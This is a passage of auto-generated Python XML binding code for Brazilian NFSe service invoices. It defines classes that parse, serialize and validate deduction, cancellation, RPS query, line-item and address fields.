showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFReferencia>%s</ns1:NumeroNFReferencia>%s' % (self.gds_format_integer(self.NumeroNFReferencia, input_name='NumeroNFReferencia'), eol_))
if self.ValorTotalReferencia is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorTotalReferencia>%s</ns1:ValorTotalReferencia>%s' % (self.gds_format_float(self.ValorTotalReferencia, input_name='ValorTotalReferencia'), eol_))
if self.PercentualDeduzir is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:PercentualDeduzir>%s</ns1:PercentualDeduzir>%s' % (self.gds_format_float(self.PercentualDeduzir, input_name='PercentualDeduzir'), eol_))
if self.ValorDeduzir is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorDeduzir>%s</ns1:ValorDeduzir>%s' % (self.gds_format_float(self.ValorDeduzir, input_name='ValorDeduzir'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'DeducaoPor':
DeducaoPor_ = child_.text
DeducaoPor_ = self.gds_validate_string(DeducaoPor_, node, 'DeducaoPor')
self.DeducaoPor = DeducaoPor_
# validate type tpDeducaoPor
self.validate_tpDeducaoPor(self.DeducaoPor)
elif nodeName_ == 'TipoDeducao':
TipoDeducao_ = child_.text
TipoDeducao_ = self.gds_validate_string(TipoDeducao_, node, 'TipoDeducao')
self.TipoDeducao = TipoDeducao_
# validate type tpTipoDeducao
self.validate_tpTipoDeducao(self.TipoDeducao)
elif nodeName_ == 'CPFCNPJReferencia':
CPFCNPJReferencia_ = child_.text
CPFCNPJReferencia_ = self.gds_validate_string(CPFCNPJReferencia_, node, 'CPFCNPJReferencia')
self.CPFCNPJReferencia = CPFCNPJReferencia_
# validate type tpCPFCNPJnulo
self.validate_tpCPFCNPJnulo(self.CPFCNPJReferencia)
elif nodeName_ == 'NumeroNFReferencia':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFReferencia')
self.NumeroNFReferencia = ival_
# validate type tpNumeroNFReferencia
self.validate_tpNumeroNFReferencia(self.NumeroNFReferencia)
elif nodeName_ == 'ValorTotalReferencia':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotalReferencia')
self.ValorTotalReferencia = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotalReferencia)
elif nodeName_ == 'PercentualDeduzir':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'PercentualDeduzir')
self.PercentualDeduzir = fval_
# validate type tpPercentual
self.validate_tpPercentual(self.PercentualDeduzir)
elif nodeName_ == 'ValorDeduzir':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorDeduzir')
self.ValorDeduzir = fval_
# validate type tpValor
self.validate_tpValor(self.ValorDeduzir)
# end class tpDeducoes
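def _example_tpDeducoes_validation():
    # Illustrative sketch (not part of the generated bindings): the
    # generated validators only emit warnings (they never raise), so schema
    # violations can be collected with the standard warnings machinery.
    import warnings
    with warnings.catch_warnings(record=True) as caught:
        warnings.simplefilter('always')
        tpDeducoes(DeducaoPor='Outro')  # not in ('Valor', 'Percentual')
    return [str(w.message) for w in caught]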
class tpNotaCancelamentoNFSe(GeneratedsSuper):
"""Tipo Detalhes do Cancelamento de NFSe."""
subclass = None
superclass = None
def __init__(self, Id=None, InscricaoMunicipalPrestador=None, NumeroNota=None, CodigoVerificacao=None, MotivoCancelamento=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.NumeroNota = NumeroNota
self.validate_tpNumero(self.NumeroNota)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
self.MotivoCancelamento = MotivoCancelamento
self.validate_tpMotCancelamento(self.MotivoCancelamento)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNotaCancelamentoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNotaCancelamentoNFSe.subclass:
return tpNotaCancelamentoNFSe.subclass(*args_, **kwargs_)
else:
return tpNotaCancelamentoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def validate_tpMotCancelamento(self, value):
# Validate type tpMotCancelamento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 80:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.InscricaoMunicipalPrestador is not None or
self.NumeroNota is not None or
self.CodigoVerificacao is not None or
self.MotivoCancelamento is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNotaCancelamentoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNotaCancelamentoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNotaCancelamentoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNotaCancelamentoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNotaCancelamentoNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNotaCancelamentoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.NumeroNota is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNota>%s</ns1:NumeroNota>%s' % (self.gds_format_integer(self.NumeroNota, input_name='NumeroNota'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
if self.MotivoCancelamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MotivoCancelamento>%s</ns1:MotivoCancelamento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MotivoCancelamento), input_name='MotivoCancelamento')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'NumeroNota':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNota')
self.NumeroNota = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNota)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
elif nodeName_ == 'MotivoCancelamento':
MotivoCancelamento_ = child_.text
MotivoCancelamento_ = self.gds_validate_string(MotivoCancelamento_, node, 'MotivoCancelamento')
self.MotivoCancelamento = MotivoCancelamento_
# validate type tpMotCancelamento
self.validate_tpMotCancelamento(self.MotivoCancelamento)
# end class tpNotaCancelamentoNFSe
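def _example_tpNotaCancelamentoNFSe():
    # Illustrative sketch (not part of the generated bindings): unlike the
    # neighbouring types, this one carries an XML attribute (Id), written
    # by exportAttributes() above. All values are placeholder assumptions.
    import io
    nota = tpNotaCancelamentoNFSe(
        Id='nota1', InscricaoMunicipalPrestador=12345678, NumeroNota=42,
        CodigoVerificacao='ABC123',
        MotivoCancelamento='Emitida em duplicidade')
    buf = io.StringIO()
    nota.export(buf, 0)
    return buf.getvalue()  # '<ns1:tpNotaCancelamentoNFSe Id="nota1">...'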
class tpDetalhesConsultaRPS(GeneratedsSuper):
"""Tipo Detalhes da Consulta de RPS."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, SerieRPS=None, NumeroRPS=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpDetalhesConsultaRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpDetalhesConsultaRPS.subclass:
return tpDetalhesConsultaRPS.subclass(*args_, **kwargs_)
else:
return tpDetalhesConsultaRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpDetalhesConsultaRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpDetalhesConsultaRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpDetalhesConsultaRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpDetalhesConsultaRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpDetalhesConsultaRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpDetalhesConsultaRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
# end class tpDetalhesConsultaRPS
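def _example_roundtrip_tpDetalhesConsultaRPS():
    # Illustrative sketch (not part of the generated bindings): an
    # export()/build() round trip. The namespace URI is a placeholder
    # assumption, not taken from the schema.
    import io
    import xml.etree.ElementTree as etree_example_
    src = tpDetalhesConsultaRPS(InscricaoPrestador=12345678,
                                SerieRPS='NF', NumeroRPS=1)
    buf = io.StringIO()
    src.export(buf, 0, namespacedef_='xmlns:ns1="urn:example:nfse"')
    node = etree_example_.fromstring(buf.getvalue())
    return tpDetalhesConsultaRPS.factory().build(node)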
class tpItens(GeneratedsSuper):
"""Tipo Itens de Nota Fiscal."""
subclass = None
superclass = None
def __init__(self, DiscriminacaoServico=None, Quantidade=None, ValorUnitario=None, ValorTotal=None, Tributavel=None):
self.original_tagname_ = None
self.DiscriminacaoServico = DiscriminacaoServico
self.validate_tpDiscriminacao(self.DiscriminacaoServico)
self.Quantidade = Quantidade
self.validate_tpQuantidade(self.Quantidade)
self.ValorUnitario = ValorUnitario
self.validate_tpValor4d(self.ValorUnitario)
self.ValorTotal = ValorTotal
self.validate_tpValor(self.ValorTotal)
self.Tributavel = Tributavel
self.validate_tpItemTributavel(self.Tributavel)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpItens)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpItens.subclass:
return tpItens.subclass(*args_, **kwargs_)
else:
return tpItens(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpDiscriminacao(self, value):
# Validate type tpDiscriminacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 250:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDiscriminacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDiscriminacao' % {"value" : value.encode("utf-8")} )
def validate_tpQuantidade(self, value):
# Validate type tpQuantidade, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpQuantidade' % {"value" : value} )
if len(str(value)) >= 10:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpQuantidade' % {"value" : value} )
def validate_tpValor4d(self, value):
# Validate type tpValor4d, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor4d' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor4d' % {"value" : value} )
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpValor_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpItemTributavel(self, value):
# Validate type tpItemTributavel, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['S', 'N']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpItemTributavel' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.DiscriminacaoServico is not None or
self.Quantidade is not None or
self.ValorUnitario is not None or
self.ValorTotal is not None or
self.Tributavel is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpItens', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpItens')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpItens')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpItens', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpItens'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpItens', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.DiscriminacaoServico is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DiscriminacaoServico>%s</ns1:DiscriminacaoServico>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DiscriminacaoServico), input_name='DiscriminacaoServico')), eol_))
if self.Quantidade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Quantidade>%s</ns1:Quantidade>%s' % (self.gds_format_float(self.Quantidade, input_name='Quantidade'), eol_))
if self.ValorUnitario is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorUnitario>%s</ns1:ValorUnitario>%s' % (self.gds_format_float(self.ValorUnitario, input_name='ValorUnitario'), eol_))
if self.ValorTotal is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorTotal>%s</ns1:ValorTotal>%s' % (self.gds_format_float(self.ValorTotal, input_name='ValorTotal'), eol_))
if self.Tributavel is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Tributavel>%s</ns1:Tributavel>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Tributavel), input_name='Tributavel')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'DiscriminacaoServico':
DiscriminacaoServico_ = child_.text
DiscriminacaoServico_ = self.gds_validate_string(DiscriminacaoServico_, node, 'DiscriminacaoServico')
self.DiscriminacaoServico = DiscriminacaoServico_
# validate type tpDiscriminacao
self.validate_tpDiscriminacao(self.DiscriminacaoServico)
elif nodeName_ == 'Quantidade':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'Quantidade')
self.Quantidade = fval_
# validate type tpQuantidade
self.validate_tpQuantidade(self.Quantidade)
elif nodeName_ == 'ValorUnitario':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorUnitario')
self.ValorUnitario = fval_
# validate type tpValor4d
self.validate_tpValor4d(self.ValorUnitario)
elif nodeName_ == 'ValorTotal':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotal')
self.ValorTotal = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotal)
elif nodeName_ == 'Tributavel':
Tributavel_ = child_.text
Tributavel_ = self.gds_validate_string(Tributavel_, node, 'Tributavel')
self.Tributavel = Tributavel_
# validate type tpItemTributavel
self.validate_tpItemTributavel(self.Tributavel)
# end class tpItens
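# Usage sketch (illustrative values only, not taken from any real invoice):
# a tpItens line item can be constructed directly and serialized with
# export(). Per the schema enumeration, Tributavel accepts only 'S' or 'N'.
#
#     import sys
#     item = tpItens(
#         DiscriminacaoServico='Servico de consultoria',
#         Quantidade=2.0,
#         ValorUnitario=150.0,
#         ValorTotal=300.0,
#         Tributavel='S',
#     )
#     item.export(sys.stdout, level=0)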
class tpEndereco(GeneratedsSuper):
"""Tipo Endereço."""
subclass = None
superclass = None
def __init__(self, TipoLogradouro=None, Logradouro=None, NumeroEndereco=None, ComplementoEndereco=None, TipoBairro=None, Bairro=None, Cidade=None, UF=None, CEP=None):
self.original_tagname_ = None
self.TipoLogradouro = TipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouro)
self.Logradouro = Logradouro
self.validate_tpLogradouro(self.Logradouro)
self.NumeroEndereco = NumeroEndereco
self.validate_tpNumeroEndereco(self.NumeroEndereco)
self.ComplementoEndereco = ComplementoEndereco
self.validate_tpComplementoEndereco(self.ComplementoEndereco)
self.TipoBairro = TipoBairro
self.validate_tpTipoBairro(self.TipoBairro)
self.Bairro = Bairro
self.validate_tpBairro(self.Bairro)
self.Cidade = Cidade
self.validate_tpCidade(self.Cidade)
self.UF = UF
self.validate_tpUF(self.UF)
self.CEP = CEP
self.validate_tpCEP(self.CEP)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpEndereco)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpEndereco.subclass:
return tpEndereco.subclass(*args_, **kwargs_)
else:
return tpEndereco(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpTipoLogradouro(self, value):
# Validate type tpTipoLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpLogradouro(self, value):
# Validate type tpLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpNumeroEndereco(self, value):
# Validate type tpNumeroEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 9:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpComplementoEndereco(self, value):
# Validate type tpComplementoEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpTipoBairro(self, value):
# Validate type tpTipoBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
def validate_tpBairro(self, value):
# Validate type tpBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
def validate_tpCidade(self, value):
# Validate type tpCidade, a restriction on xs:unsignedInt.
if value is not None and Validate_simpletypes_:
            if not self.gds_validate_simple_patterns(
                    self.validate_tpCidade_patterns_, str(value)):  # patterns need a string; value is parsed as an integer
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpCidade_patterns_, ))
